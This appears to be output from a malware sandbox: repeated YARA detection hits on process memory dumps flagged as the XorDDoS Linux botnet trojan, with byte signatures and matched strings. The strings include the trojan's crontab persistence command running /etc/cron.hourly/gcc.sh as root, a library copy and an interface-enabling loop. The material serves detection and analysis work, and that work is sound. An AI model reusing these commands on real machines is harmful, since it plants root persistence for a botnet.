6421.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6525.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6525.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6525.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6525.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6525.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6525.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6525.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6347.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6347.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6347.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6347.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6347.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6347.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6347.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6361.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6361.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6361.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6361.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6361.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6361.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6361.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6494.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6494.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6494.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6494.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6494.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6494.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6494.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6273.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6273.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6273.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6273.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6273.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6273.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6273.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6448.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6448.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6448.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6448.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6448.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6448.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6448.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6511.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6511.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6511.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6511.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6511.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6511.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6511.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6382.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6382.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6382.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6382.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6382.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6382.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6382.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6451.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6451.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6451.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6451.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6451.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6451.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
